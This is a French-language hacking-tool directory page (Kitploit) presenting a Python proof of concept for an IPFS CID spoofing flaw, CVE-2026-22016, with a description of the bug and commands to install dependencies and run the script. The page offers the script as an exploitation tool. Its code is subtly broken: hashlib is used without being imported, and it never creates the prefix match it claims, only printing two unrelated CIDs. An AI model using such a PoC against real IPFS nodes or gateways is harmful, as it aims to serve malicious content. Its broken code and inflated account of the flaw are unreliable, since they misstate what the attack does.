Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension — Preuve de concept en Python démontrant l'usurpation de CID IPFS via l'extension de longueur multihash, mettant en évidence les failles de vérification de l'adressage par contenu qui peuvent empoisonner les passerelles IPFS. | Kitploit
Outils/GitHubGitHub/george0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension
Analyse des VulnérabilitésExploitationAnalyse de HachageSécurité WebCryptographieAttaque Adversariale
GitHubgeorge0papasotiriou/cve-2026-22016-ipfs-cid-spoofing-via-multihash-length-extension

CVE-2026-22016-IPFS-CID-Spoofing-via-Multihash-Length-Extension

Preuve de concept en Python démontrant l'usurpation de CID IPFS via l'extension de longueur multihash, mettant en évidence les failles de vérification de l'adressage par contenu qui peuvent empoisonner les passerelles IPFS.

Voir le dépôt
8il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-22016 – Usurpation de CID IPFS via extension de longueur de multihash

Code du programme (Python)

root@kitploit:~
# ipfs_cid_spoof.py - Generates a CID with a different multihash length
import multihash, cid
# Attacker creates a file whose hash, when truncated, matches a different file's prefix
original_content = b"hello"
fake_content = b"hello world"
real_cid = cid.make_cid(1, 'dag-pb', multihash.encode(hashlib.sha256(original_content).digest(), 'sha2-256'))
# Spoofed CID: we can craft a multihash with a shorter length that matches the start of the real one
spoofed_multihash = multihash.encode(hashlib.sha256(fake_content).digest()[:16], 'sha2-256', length=16)
spoofed_cid = cid.make_cid(1, 'dag-pb', spoofed_multihash)
print(f"Real CID: {real_cid}")
print(f"Spoofed CID: {spoofed_cid}")
# If IPFS node only checks prefix, it may serve the wrong content.

CVE-2026-22016 – Usurpation de CID IPFS via extension de longueur de multihash

Severity: High

Présentation

Une implémentation IPFS se fie au champ de longueur du multihash d'un CID sans vérifier que le hash lui-même correspond au contenu complet. Un attaquant peut créer un fichier dont le hash tronqué équivaut au préfixe du hash d'un fichier légitime et servir le fichier malveillant sous le même CID.

Détails de la vulnérabilité

  • Type : Usurpation de contenu
  • Impact : Diffusion de contenu malveillant, empoisonnement des passerelles IPFS.
  • Cause racine : La vérification du CID ne contrôle pas que la longueur du condensat correspond à la sortie attendue de la fonction de hachage.

Démonstration de l'exploit

Exécutez le script :

root@kitploit:~
pip install py-multihash py-cid
python ipfs_cid_spoof.py

Cela montre qu'un CID usurpé peut être généré.

Télécharger l’outil